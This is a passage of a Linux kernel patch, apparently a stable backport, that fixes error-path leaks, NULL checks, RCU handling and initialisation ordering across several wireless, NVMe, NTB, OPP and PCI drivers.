++++ b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.c
+@@ -57,12 +57,11 @@ void wlc_phy_shim_detach(struct phy_shim_info *physhim)
+ }
+ 
+ struct wlapi_timer *wlapi_init_timer(struct phy_shim_info *physhim,
+-				     void (*fn)(struct brcms_phy *pi),
++				     void (*fn)(void *pi),
+ 				     void *arg, const char *name)
+ {
+ 	return (struct wlapi_timer *)
+-			brcms_init_timer(physhim->wl, (void (*)(void *))fn,
+-					 arg, name);
++			brcms_init_timer(physhim->wl, fn, arg, name);
+ }
+ 
+ void wlapi_free_timer(struct wlapi_timer *t)
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.h b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.h
+index dd8774717adee..27d0934e600ed 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.h
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.h
+@@ -131,7 +131,7 @@ void wlc_phy_shim_detach(struct phy_shim_info *physhim);
+ 
+ /* PHY to WL utility functions */
+ struct wlapi_timer *wlapi_init_timer(struct phy_shim_info *physhim,
+-				     void (*fn)(struct brcms_phy *pi),
++				     void (*fn)(void *pi),
+ 				     void *arg, const char *name);
+ void wlapi_free_timer(struct wlapi_timer *t);
+ void wlapi_add_timer(struct wlapi_timer *t, uint ms, int periodic);
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+index f5fcc547de391..235963e1d7a9a 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+@@ -725,7 +725,7 @@ int iwl_sar_get_ewrd_table(struct iwl_fw_runtime *fwrt)
+ 	 * from index 1, so the maximum value allowed here is
+ 	 * ACPI_SAR_PROFILES_NUM - 1.
+ 	 */
+-	if (n_profiles <= 0 || n_profiles >= ACPI_SAR_PROFILE_NUM) {
++	if (n_profiles >= ACPI_SAR_PROFILE_NUM) {
+ 		ret = -EINVAL;
+ 		goto out_free;
+ 	}
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+index 5979d904bbbd2..677c9e0b46f10 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+@@ -103,6 +103,12 @@ static int iwl_dbg_tlv_alloc_debug_info(struct iwl_trans *trans,
+ 	if (le32_to_cpu(tlv->length) != sizeof(*debug_info))
+ 		return -EINVAL;
+ 
++	/* we use this as a string, ensure input was NUL terminated */
++	if (strnlen(debug_info->debug_cfg_name,
++		    sizeof(debug_info->debug_cfg_name)) ==
++			sizeof(debug_info->debug_cfg_name))
++		return -EINVAL;
++
+ 	IWL_DEBUG_FW(trans, "WRT: Loading debug cfg: %s\n",
+ 		     debug_info->debug_cfg_name);
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+index 2748459d12279..88f4f429d875c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+@@ -461,12 +461,10 @@ static int iwl_mvm_wowlan_config_rsc_tsc(struct iwl_mvm *mvm,
+ 		struct wowlan_key_rsc_v5_data data = {};
+ 		int i;
+ 
+-		data.rsc = kmalloc(sizeof(*data.rsc), GFP_KERNEL);
++		data.rsc = kzalloc(sizeof(*data.rsc), GFP_KERNEL);
+ 		if (!data.rsc)
+ 			return -ENOMEM;
+ 
+-		memset(data.rsc, 0xff, sizeof(*data.rsc));
+-
+ 		for (i = 0; i < ARRAY_SIZE(data.rsc->mcast_key_id_map); i++)
+ 			data.rsc->mcast_key_id_map[i] =
+ 				IWL_MCAST_KEY_MAP_INVALID;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+index f268a31ce26d9..105f283b777d2 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+@@ -299,6 +299,7 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 				u32 status,
+ 				struct ieee80211_rx_status *stats)
+ {
++	struct wireless_dev *wdev;
+ 	struct iwl_mvm_sta *mvmsta;
+ 	struct iwl_mvm_vif *mvmvif;
+ 	u8 keyid;
+@@ -320,9 +321,15 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 	if (!ieee80211_is_beacon(hdr->frame_control))
+ 		return 0;
+ 
++	if (!sta)
++		return -1;
++
++	mvmsta = iwl_mvm_sta_from_mac80211(sta);
++	mvmvif = iwl_mvm_vif_from_mac80211(mvmsta->vif);
++
+ 	/* key mismatch - will also report !MIC_OK but we shouldn't count it */
+ 	if (!(status & IWL_RX_MPDU_STATUS_KEY_VALID))
+-		return -1;
++		goto report;
+ 
+ 	/* good cases */
+ 	if (likely(status & IWL_RX_MPDU_STATUS_MIC_OK &&
+@@ -331,13 +338,6 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 		return 0;
+ 	}
+ 
+-	if (!sta)
+-		return -1;
+-
+-	mvmsta = iwl_mvm_sta_from_mac80211(sta);
+-
+-	mvmvif = iwl_mvm_vif_from_mac80211(mvmsta->vif);
+-
+ 	/*
+ 	 * both keys will have the same cipher and MIC length, use
+ 	 * whichever one is available
+@@ -346,11 +346,11 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 	if (!key) {
+ 		key = rcu_dereference(mvmvif->bcn_prot.keys[1]);
+ 		if (!key)
+-			return -1;
++			goto report;
+ 	}
+ 
+ 	if (len < key->icv_len + IEEE80211_GMAC_PN_LEN + 2)
+-		return -1;
++		goto report;
+ 
+ 	/* get the real key ID */
+ 	keyid = frame[len - key->icv_len - IEEE80211_GMAC_PN_LEN - 2];
+@@ -364,7 +364,7 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 			return -1;
+ 		key = rcu_dereference(mvmvif->bcn_prot.keys[keyid - 6]);
+ 		if (!key)
+-			return -1;
++			goto report;
+ 	}
+ 
+ 	/* Report status to mac80211 */
+@@ -372,6 +372,10 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 		ieee80211_key_mic_failure(key);
+ 	else if (status & IWL_RX_MPDU_STATUS_REPLAY_ERROR)
+ 		ieee80211_key_replay(key);
++report:
++	wdev = ieee80211_vif_to_wdev(mvmsta->vif);
++	if (wdev->netdev)
++		cfg80211_rx_unprot_mlme_mgmt(wdev->netdev, (void *)hdr, len);
+ 
+ 	return -1;
+ }
+diff --git a/drivers/net/wireless/marvell/libertas/cmd.c b/drivers/net/wireless/marvell/libertas/cmd.c
+index 104d2b6dc9af6..5a525da434c28 100644
+--- a/drivers/net/wireless/marvell/libertas/cmd.c
++++ b/drivers/net/wireless/marvell/libertas/cmd.c
+@@ -1132,7 +1132,7 @@ int lbs_allocate_cmd_buffer(struct lbs_private *priv)
+ 		if (!cmdarray[i].cmdbuf) {
+ 			lbs_deb_host("ALLOC_CMD_BUF: ptempvirtualaddr is NULL\n");
+ 			ret = -1;
+-			goto done;
++			goto free_cmd_array;
+ 		}
+ 	}
+ 
+@@ -1140,8 +1140,17 @@ int lbs_allocate_cmd_buffer(struct lbs_private *priv)
+ 		init_waitqueue_head(&cmdarray[i].cmdwait_q);
+ 		lbs_cleanup_and_insert_cmd(priv, &cmdarray[i]);
+ 	}
+-	ret = 0;
++	return 0;
+ 
++free_cmd_array:
++	for (i = 0; i < LBS_NUM_CMD_BUFFERS; i++) {
++		if (cmdarray[i].cmdbuf) {
++			kfree(cmdarray[i].cmdbuf);
++			cmdarray[i].cmdbuf = NULL;
++		}
++	}
++	kfree(priv->cmd_array);
++	priv->cmd_array = NULL;
+ done:
+ 	return ret;
+ }
+diff --git a/drivers/net/wireless/marvell/mwifiex/debugfs.c b/drivers/net/wireless/marvell/mwifiex/debugfs.c
+index 63f232c723374..55ca5b287fe7f 100644
+--- a/drivers/net/wireless/marvell/mwifiex/debugfs.c
++++ b/drivers/net/wireless/marvell/mwifiex/debugfs.c
+@@ -964,9 +964,6 @@ mwifiex_dev_debugfs_init(struct mwifiex_private *priv)
+ 	priv->dfs_dev_dir = debugfs_create_dir(priv->netdev->name,
+ 					       mwifiex_dfs_dir);
+ 
+-	if (!priv->dfs_dev_dir)
+-		return;
+-
+ 	MWIFIEX_DFS_ADD_FILE(info);
+ 	MWIFIEX_DFS_ADD_FILE(debug);
+ 	MWIFIEX_DFS_ADD_FILE(getlog);
+diff --git a/drivers/net/wireless/microchip/wilc1000/cfg80211.c b/drivers/net/wireless/microchip/wilc1000/cfg80211.c
+index b545d93c6e374..6f3245a43aef1 100644
+--- a/drivers/net/wireless/microchip/wilc1000/cfg80211.c
++++ b/drivers/net/wireless/microchip/wilc1000/cfg80211.c
+@@ -1615,7 +1615,6 @@ static int del_virtual_intf(struct wiphy *wiphy, struct wireless_dev *wdev)
+ 	cfg80211_unregister_netdevice(vif->ndev);
+ 	vif->monitor_flag = 0;
+ 
+-	wilc_set_operation_mode(vif, 0, 0, 0);
+ 	mutex_lock(&wl->vif_mutex);
+ 	list_del_rcu(&vif->list);
+ 	wl->vif_num--;
+@@ -1810,15 +1809,24 @@ int wilc_cfg80211_init(struct wilc **wilc, struct device *dev, int io_type,
+ 	INIT_LIST_HEAD(&wl->rxq_head.list);
+ 	INIT_LIST_HEAD(&wl->vif_list);
+ 
++	wl->hif_workqueue = alloc_ordered_workqueue("%s", WQ_MEM_RECLAIM,
++						    wiphy_name(wl->wiphy));
++	if (!wl->hif_workqueue) {
++		ret = -ENOMEM;
++		goto free_cfg;
++	}
+ 	vif = wilc_netdev_ifc_init(wl, "wlan%d", WILC_STATION_MODE,
+ 				   NL80211_IFTYPE_STATION, false);
+ 	if (IS_ERR(vif)) {
+ 		ret = PTR_ERR(vif);
+-		goto free_cfg;
++		goto free_hq;
+ 	}
+ 
+ 	return 0;
+ 
++free_hq:
++	destroy_workqueue(wl->hif_workqueue);
++
+ free_cfg:
+ 	wilc_wlan_cfg_deinit(wl);
+ 
+diff --git a/drivers/net/wireless/microchip/wilc1000/hif.c b/drivers/net/wireless/microchip/wilc1000/hif.c
+index a1b75feec6edf..5eb02902e875a 100644
+--- a/drivers/net/wireless/microchip/wilc1000/hif.c
++++ b/drivers/net/wireless/microchip/wilc1000/hif.c
+@@ -374,38 +374,49 @@ static void handle_connect_timeout(struct work_struct *work)
+ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 				struct cfg80211_crypto_settings *crypto)
+ {
+-	struct wilc_join_bss_param *param;
+-	struct ieee80211_p2p_noa_attr noa_attr;
+-	u8 rates_len = 0;
+-	const u8 *tim_elm, *ssid_elm, *rates_ie, *supp_rates_ie;
++	const u8 *ies_data, *tim_elm, *ssid_elm, *rates_ie, *supp_rates_ie;
+ 	const u8 *ht_ie, *wpa_ie, *wmm_ie, *rsn_ie;
++	struct ieee80211_p2p_noa_attr noa_attr;
++	const struct cfg80211_bss_ies *ies;
++	struct wilc_join_bss_param *param;
++	u8 rates_len = 0, ies_len;
+ 	int ret;
+-	const struct cfg80211_bss_ies *ies = rcu_dereference(bss->ies);
+ 
+ 	param = kzalloc(sizeof(*param), GFP_KERNEL);
+ 	if (!param)
+ 		return NULL;
+ 
++	rcu_read_lock();
++	ies = rcu_dereference(bss->ies);
++	ies_data = kmemdup(ies->data, ies->len, GFP_ATOMIC);
++	if (!ies_data) {
++		rcu_read_unlock();
++		kfree(param);
++		return NULL;
++	}
++	ies_len = ies->len;
++	rcu_read_unlock();
++
+ 	param->beacon_period = cpu_to_le16(bss->beacon_interval);
+ 	param->cap_info = cpu_to_le16(bss->capability);
+ 	param->bss_type = WILC_FW_BSS_TYPE_INFRA;
+ 	param->ch = ieee80211_frequency_to_channel(bss->channel->center_freq);
+ 	ether_addr_copy(param->bssid, bss->bssid);
+ 
+-	ssid_elm = cfg80211_find_ie(WLAN_EID_SSID, ies->data, ies->len);
++	ssid_elm = cfg80211_find_ie(WLAN_EID_SSID, ies_data, ies_len);
+ 	if (ssid_elm) {
+ 		if (ssid_elm[1] <= IEEE80211_MAX_SSID_LEN)
+ 			memcpy(param->ssid, ssid_elm + 2, ssid_elm[1]);
+ 	}
+ 
+-	tim_elm = cfg80211_find_ie(WLAN_EID_TIM, ies->data, ies->len);
++	tim_elm = cfg80211_find_ie(WLAN_EID_TIM, ies_data, ies_len);
+ 	if (tim_elm && tim_elm[1] >= 2)
+ 		param->dtim_period = tim_elm[3];
+ 
+ 	memset(param->p_suites, 0xFF, 3);
+ 	memset(param->akm_suites, 0xFF, 3);
+ 
+-	rates_ie = cfg80211_find_ie(WLAN_EID_SUPP_RATES, ies->data, ies->len);
++	rates_ie = cfg80211_find_ie(WLAN_EID_SUPP_RATES, ies_data, ies_len);
+ 	if (rates_ie) {
+ 		rates_len = rates_ie[1];
+ 		if (rates_len > WILC_MAX_RATES_SUPPORTED)
+@@ -416,7 +427,7 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 
+ 	if (rates_len < WILC_MAX_RATES_SUPPORTED) {
+ 		supp_rates_ie = cfg80211_find_ie(WLAN_EID_EXT_SUPP_RATES,
+-						 ies->data, ies->len);
++						 ies_data, ies_len);
+ 		if (supp_rates_ie) {
+ 			u8 ext_rates = supp_rates_ie[1];
+ 
+@@ -431,11 +442,11 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 		}
+ 	}
+ 
+-	ht_ie = cfg80211_find_ie(WLAN_EID_HT_CAPABILITY, ies->data, ies->len);
++	ht_ie = cfg80211_find_ie(WLAN_EID_HT_CAPABILITY, ies_data, ies_len);
+ 	if (ht_ie)
+ 		param->ht_capable = true;
+ 
+-	ret = cfg80211_get_p2p_attr(ies->data, ies->len,
++	ret = cfg80211_get_p2p_attr(ies_data, ies_len,
+ 				    IEEE80211_P2P_ATTR_ABSENCE_NOTICE,
+ 				    (u8 *)&noa_attr, sizeof(noa_attr));
+ 	if (ret > 0) {
+@@ -459,7 +470,7 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 	}
+ 	wmm_ie = cfg80211_find_vendor_ie(WLAN_OUI_MICROSOFT,
+ 					 WLAN_OUI_TYPE_MICROSOFT_WMM,
+-					 ies->data, ies->len);
++					 ies_data, ies_len);
+ 	if (wmm_ie) {
+ 		struct ieee80211_wmm_param_ie *ie;
+ 
+@@ -474,13 +485,13 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 
+ 	wpa_ie = cfg80211_find_vendor_ie(WLAN_OUI_MICROSOFT,
+ 					 WLAN_OUI_TYPE_MICROSOFT_WPA,
+-					 ies->data, ies->len);
++					 ies_data, ies_len);
+ 	if (wpa_ie) {
+ 		param->mode_802_11i = 1;
+ 		param->rsn_found = true;
+ 	}
+ 
+-	rsn_ie = cfg80211_find_ie(WLAN_EID_RSN, ies->data, ies->len);
++	rsn_ie = cfg80211_find_ie(WLAN_EID_RSN, ies_data, ies_len);
+ 	if (rsn_ie) {
+ 		int rsn_ie_len = sizeof(struct element) + rsn_ie[1];
+ 		int offset = 8;
+@@ -514,6 +525,7 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 			param->akm_suites[i] = crypto->akm_suites[i] & 0xFF;
+ 	}
+ 
++	kfree(ies_data);
+ 	return (void *)param;
+ }
+ 
+diff --git a/drivers/net/wireless/microchip/wilc1000/netdev.c b/drivers/net/wireless/microchip/wilc1000/netdev.c
+index e9f59de31b0b9..b714da48eaa17 100644
+--- a/drivers/net/wireless/microchip/wilc1000/netdev.c
++++ b/drivers/net/wireless/microchip/wilc1000/netdev.c
+@@ -878,8 +878,7 @@ static const struct net_device_ops wilc_netdev_ops = {
+ 
+ void wilc_netdev_cleanup(struct wilc *wilc)
+ {
+-	struct wilc_vif *vif;
+-	int srcu_idx, ifc_cnt = 0;
++	struct wilc_vif *vif, *vif_tmp;
+ 
+ 	if (!wilc)
+ 		return;
+@@ -889,32 +888,19 @@ void wilc_netdev_cleanup(struct wilc *wilc)
+ 		wilc->firmware = NULL;
+ 	}
+ 
+-	srcu_idx = srcu_read_lock(&wilc->srcu);
+-	list_for_each_entry_rcu(vif, &wilc->vif_list, list) {
++	list_for_each_entry_safe(vif, vif_tmp, &wilc->vif_list, list) {
++		mutex_lock(&wilc->vif_mutex);
++		list_del_rcu(&vif->list);
++		wilc->vif_num--;
++		mutex_unlock(&wilc->vif_mutex);
++		synchronize_srcu(&wilc->srcu);
+ 		if (vif->ndev)
+ 			unregister_netdev(vif->ndev);
+ 	}
+-	srcu_read_unlock(&wilc->srcu, srcu_idx);
+ 
+ 	wilc_wfi_deinit_mon_interface(wilc, false);
+ 	destroy_workqueue(wilc->hif_workqueue);
+ 
+-	while (ifc_cnt < WILC_NUM_CONCURRENT_IFC) {
+-		mutex_lock(&wilc->vif_mutex);
+-		if (wilc->vif_num <= 0) {
+-			mutex_unlock(&wilc->vif_mutex);
+-			break;
+-		}
+-		vif = wilc_get_wl_to_vif(wilc);
+-		if (!IS_ERR(vif))
+-			list_del_rcu(&vif->list);
+-
+-		wilc->vif_num--;
+-		mutex_unlock(&wilc->vif_mutex);
+-		synchronize_srcu(&wilc->srcu);
+-		ifc_cnt++;
+-	}
+-
+ 	wilc_wlan_cfg_deinit(wilc);
+ 	wlan_deinit_locks(wilc);
+ 	wiphy_unregister(wilc->wiphy);
+@@ -977,13 +963,6 @@ struct wilc_vif *wilc_netdev_ifc_init(struct wilc *wl, const char *name,
+ 		goto error;
+ 	}
+ 
+-	wl->hif_workqueue = alloc_ordered_workqueue("%s-wq", WQ_MEM_RECLAIM,
+-						    ndev->name);
+-	if (!wl->hif_workqueue) {
+-		ret = -ENOMEM;
+-		goto unregister_netdev;
+-	}
+-
+ 	ndev->needs_free_netdev = true;
+ 	vif->iftype = vif_type;
+ 	vif->idx = wilc_get_available_idx(wl);
+@@ -996,12 +975,11 @@ struct wilc_vif *wilc_netdev_ifc_init(struct wilc *wl, const char *name,
+ 
+ 	return vif;
+ 
+-unregister_netdev:
++error:
+ 	if (rtnl_locked)
+ 		cfg80211_unregister_netdevice(ndev);
+ 	else
+ 		unregister_netdev(ndev);
+-  error:
+ 	free_netdev(ndev);
+ 	return ERR_PTR(ret);
+ }
+diff --git a/drivers/net/wireless/microchip/wilc1000/spi.c b/drivers/net/wireless/microchip/wilc1000/spi.c
+index b0fc5e68feeca..5877e2c1fa0fc 100644
+--- a/drivers/net/wireless/microchip/wilc1000/spi.c
++++ b/drivers/net/wireless/microchip/wilc1000/spi.c
+@@ -191,11 +191,11 @@ static void wilc_wlan_power(struct wilc *wilc, bool on)
+ 		/* assert ENABLE: */
+ 		gpiod_set_value(gpios->enable, 1);
+ 		mdelay(5);
+-		/* assert RESET: */
+-		gpiod_set_value(gpios->reset, 1);
+-	} else {
+ 		/* deassert RESET: */
+ 		gpiod_set_value(gpios->reset, 0);
++	} else {
++		/* assert RESET: */
++		gpiod_set_value(gpios->reset, 1);
+ 		/* deassert ENABLE: */
+ 		gpiod_set_value(gpios->enable, 0);
+ 	}
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index 6dd5ec1e4d8c3..ccac47dd781d6 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -6542,6 +6542,7 @@ static void rtl8xxxu_stop(struct ieee80211_hw *hw)
+ 	if (priv->usb_interrupts)
+ 		rtl8xxxu_write32(priv, REG_USB_HIMR, 0);
+ 
++	cancel_work_sync(&priv->c2hcmd_work);
+ 	cancel_delayed_work_sync(&priv->ra_watchdog);
+ 
+ 	rtl8xxxu_free_rx_resources(priv);
+diff --git a/drivers/net/wireless/realtek/rtw88/main.c b/drivers/net/wireless/realtek/rtw88/main.c
+index 4c8164db4a9e4..81f3112923f1c 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.c
++++ b/drivers/net/wireless/realtek/rtw88/main.c
+@@ -1989,8 +1989,6 @@ static int rtw_chip_board_info_setup(struct rtw_dev *rtwdev)
+ 	rtw_phy_setup_phy_cond(rtwdev, 0);
+ 
+ 	rtw_phy_init_tx_power(rtwdev);
+-	if (rfe_def->agc_btg_tbl)
+-		rtw_load_table(rtwdev, rfe_def->agc_btg_tbl);
+ 	rtw_load_table(rtwdev, rfe_def->phy_pg_tbl);
+ 	rtw_load_table(rtwdev, rfe_def->txpwr_lmt_tbl);
+ 	rtw_phy_tx_power_by_rate_config(hal);
+diff --git a/drivers/net/wireless/realtek/rtw88/phy.c b/drivers/net/wireless/realtek/rtw88/phy.c
+index bd7d05e080848..fde7b532bc07e 100644
+--- a/drivers/net/wireless/realtek/rtw88/phy.c
++++ b/drivers/net/wireless/realtek/rtw88/phy.c
+@@ -1761,12 +1761,15 @@ static void rtw_load_rfk_table(struct rtw_dev *rtwdev)
+ 
+ void rtw_phy_load_tables(struct rtw_dev *rtwdev)
+ {
++	const struct rtw_rfe_def *rfe_def = rtw_get_rfe_def(rtwdev);
+ 	const struct rtw_chip_info *chip = rtwdev->chip;
+ 	u8 rf_path;
+ 
+ 	rtw_load_table(rtwdev, chip->mac_tbl);
+ 	rtw_load_table(rtwdev, chip->bb_tbl);
+ 	rtw_load_table(rtwdev, chip->agc_tbl);
++	if (rfe_def->agc_btg_tbl)
++		rtw_load_table(rtwdev, rfe_def->agc_btg_tbl);
+ 	rtw_load_rfk_table(rtwdev);
+ 
+ 	for (rf_path = 0; rf_path < rtwdev->hal.rf_path_num; rf_path++) {
+diff --git a/drivers/net/wireless/realtek/rtw88/rtw8821c.c b/drivers/net/wireless/realtek/rtw88/rtw8821c.c
+index 609a2b86330d8..50e3e46f7d8aa 100644
+--- a/drivers/net/wireless/realtek/rtw88/rtw8821c.c
++++ b/drivers/net/wireless/realtek/rtw88/rtw8821c.c
+@@ -674,9 +674,9 @@ static void rtw8821c_false_alarm_statistics(struct rtw_dev *rtwdev)
+ 
+ 	dm_info->cck_fa_cnt = cck_fa_cnt;
+ 	dm_info->ofdm_fa_cnt = ofdm_fa_cnt;
++	dm_info->total_fa_cnt = ofdm_fa_cnt;
+ 	if (cck_enable)
+ 		dm_info->total_fa_cnt += cck_fa_cnt;
+-	dm_info->total_fa_cnt = ofdm_fa_cnt;
+ 
+ 	crc32_cnt = rtw_read32(rtwdev, REG_CRC_CCK);
+ 	dm_info->cck_ok_cnt = FIELD_GET(GENMASK(15, 0), crc32_cnt);
+diff --git a/drivers/net/wireless/silabs/wfx/sta.c b/drivers/net/wireless/silabs/wfx/sta.c
+index 073e870b26415..871667650dbef 100644
+--- a/drivers/net/wireless/silabs/wfx/sta.c
++++ b/drivers/net/wireless/silabs/wfx/sta.c
+@@ -362,6 +362,7 @@ static int wfx_set_mfp_ap(struct wfx_vif *wvif)
+ 	const int pairwise_cipher_suite_count_offset = 8 / sizeof(u16);
+ 	const int pairwise_cipher_suite_size = 4 / sizeof(u16);
+ 	const int akm_suite_size = 4 / sizeof(u16);
++	int ret = -EINVAL;
+ 	const u16 *ptr;
+ 
+ 	if (unlikely(!skb))
+@@ -370,22 +371,26 @@ static int wfx_set_mfp_ap(struct wfx_vif *wvif)
+ 	ptr = (u16 *)cfg80211_find_ie(WLAN_EID_RSN, skb->data + ieoffset,
+ 				      skb->len - ieoffset);
+ 	if (unlikely(!ptr))
+-		return -EINVAL;
++		goto free_skb;
+ 
+ 	ptr += pairwise_cipher_suite_count_offset;
+ 	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+-		return -EINVAL;
++		goto free_skb;
+ 
+ 	ptr += 1 + pairwise_cipher_suite_size * *ptr;
+ 	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+-		return -EINVAL;
++		goto free_skb;
+ 
+ 	ptr += 1 + akm_suite_size * *ptr;
+ 	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+-		return -EINVAL;
++		goto free_skb;
+ 
+ 	wfx_hif_set_mfp(wvif, *ptr & BIT(7), *ptr & BIT(6));
+-	return 0;
++	ret = 0;
++
++free_skb:
++	dev_kfree_skb(skb);
++	return ret;
+ }
+ 
+ int wfx_start_ap(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
+diff --git a/drivers/ntb/core.c b/drivers/ntb/core.c
+index 27dd93deff6e5..d702bee780826 100644
+--- a/drivers/ntb/core.c
++++ b/drivers/ntb/core.c
+@@ -100,6 +100,8 @@ EXPORT_SYMBOL(ntb_unregister_client);
+ 
+ int ntb_register_device(struct ntb_dev *ntb)
+ {
++	int ret;
++
+ 	if (!ntb)
+ 		return -EINVAL;
+ 	if (!ntb->pdev)
+@@ -120,7 +122,11 @@ int ntb_register_device(struct ntb_dev *ntb)
+ 	ntb->ctx_ops = NULL;
+ 	spin_lock_init(&ntb->ctx_lock);
+ 
+-	return device_register(&ntb->dev);
++	ret = device_register(&ntb->dev);
++	if (ret)
++		put_device(&ntb->dev);
++
++	return ret;
+ }
+ EXPORT_SYMBOL(ntb_register_device);
+ 
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 0c088db944706..d7516e99275b6 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4971,7 +4971,8 @@ int nvme_alloc_admin_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 	set->ops = ops;
+ 	set->queue_depth = NVME_AQ_MQ_TAG_DEPTH;
+ 	if (ctrl->ops->flags & NVME_F_FABRICS)
+-		set->reserved_tags = NVMF_RESERVED_TAGS;
++		/* Reserved for fabric connect and keep alive */
++		set->reserved_tags = 2;
+ 	set->numa_node = ctrl->numa_node;
+ 	set->flags = BLK_MQ_F_NO_SCHED;
+ 	if (ctrl->ops->flags & NVME_F_BLOCKING)
+@@ -5029,7 +5030,15 @@ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 	memset(set, 0, sizeof(*set));
+ 	set->ops = ops;
+ 	set->queue_depth = ctrl->sqsize + 1;
+-	set->reserved_tags = NVMF_RESERVED_TAGS;
++	/*
++	 * Some Apple controllers requires tags to be unique across admin and
++	 * the (only) I/O queue, so reserve the first 32 tags of the I/O queue.
++	 */
++	if (ctrl->quirks & NVME_QUIRK_SHARED_TAGS)
++		set->reserved_tags = NVME_AQ_DEPTH;
++	else if (ctrl->ops->flags & NVME_F_FABRICS)
++		/* Reserved for fabric connect */
++		set->reserved_tags = 1;
+ 	set->numa_node = ctrl->numa_node;
+ 	set->flags = BLK_MQ_F_SHOULD_MERGE;
+ 	if (ctrl->ops->flags & NVME_F_BLOCKING)
+diff --git a/drivers/nvme/host/fabrics.h b/drivers/nvme/host/fabrics.h
+index dcac3df8a5f76..60c238caf7a97 100644
+--- a/drivers/nvme/host/fabrics.h
++++ b/drivers/nvme/host/fabrics.h
+@@ -18,13 +18,6 @@
+ /* default is -1: the fail fast mechanism is disabled  */
+ #define NVMF_DEF_FAIL_FAST_TMO		-1
+ 
+-/*
+- * Reserved one command for internal usage.  This command is used for sending
+- * the connect command, as well as for the keep alive command on the admin
+- * queue once live.
+- */
+-#define NVMF_RESERVED_TAGS	1
+-
+ /*
+  * Define a host as seen by the target.  We allocate one at boot, but also
+  * allow the override it when creating controllers.  This is both to provide
+diff --git a/drivers/opp/debugfs.c b/drivers/opp/debugfs.c
+index 2c7fb683441ef..de81bbf4be100 100644
+--- a/drivers/opp/debugfs.c
++++ b/drivers/opp/debugfs.c
+@@ -37,10 +37,12 @@ static ssize_t bw_name_read(struct file *fp, char __user *userbuf,
+ 			    size_t count, loff_t *ppos)
+ {
+ 	struct icc_path *path = fp->private_data;
++	const char *name = icc_get_name(path);
+ 	char buf[64];
+-	int i;
++	int i = 0;
+ 
+-	i = scnprintf(buf, sizeof(buf), "%.62s\n", icc_get_name(path));
++	if (name)
++		i = scnprintf(buf, sizeof(buf), "%.62s\n", name);
+ 
+ 	return simple_read_from_buffer(userbuf, count, ppos, buf, i);
+ }
+diff --git a/drivers/pci/endpoint/functions/pci-epf-vntb.c b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+index 8c6931210ac4d..b4c1a4f6029d4 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-vntb.c
++++ b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+@@ -1281,14 +1281,11 @@ static int pci_vntb_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	ret = ntb_register_device(&ndev->ntb);
+ 	if (ret) {
+ 		dev_err(dev, "Failed to register NTB device\n");
+-		goto err_register_dev;
++		return ret;
+ 	}
+ 
+ 	dev_dbg(dev, "PCI Virtual NTB driver loaded\n");
+ 	return 0;
+-
+-err_register_dev:
+-	return -EINVAL;
+ }
+ 
+ static struct pci_device_id pci_vntb_table[] = {
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index e1d02b7c60294..9950deeb047a7 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -357,11 +357,6 @@ static inline int pci_dev_set_disconnected(struct pci_dev *dev, void *unused)
+ 	return 0;
